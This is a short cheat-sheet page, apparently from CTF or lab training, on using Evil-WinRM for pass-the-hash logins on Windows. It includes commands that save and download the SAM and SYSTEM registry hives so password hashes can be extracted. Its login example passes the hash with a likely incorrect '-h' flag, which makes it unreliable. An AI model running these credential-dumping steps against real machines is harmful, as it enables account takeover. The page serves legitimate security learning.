Evil-WinRM#
A rather noisy tool for (shockingly) exploiting a Windows machine. While it’s fun for a lot of challenges it could be quite loud in the real world. I’d limit it to pass-the-hash attacks remotely.
Install#
sudo apt install evil-winrm
Log in with a Hash#
Known as a ‘pass the hash’ attack, in this case you can log into an account without knowing what the password is. This is because the password isnt actually transmittied during authentication, the hash is. As we know, hashes are one-way, so you cant recover the password from the hash except for brute forcing, so this is considered safe. The problem is that if you can retrieve a password hash for a user, you can just use a compatiable application (Such as Evil-WinRM) to transmit the hash instead.
evil-winrm -u [username] -h [password]
Dumping Hashes#
Pass the Hash is great, but it requires one tiny little detail - the hash. As the only thing between a hash and a password is CPU power, Hashes are also tightly regulated. Normally only Administrator or System level accounts are permitted to view or modify password hashes. For this stage, I’m assuming you already have these rights. If you dont, try the PrivilegeEscalation room.
reg save hklm\system system.bak reg save hklm\sam sam.bak download system.bak download sam.bak
You can then pass these to Impacket to dump the secrets.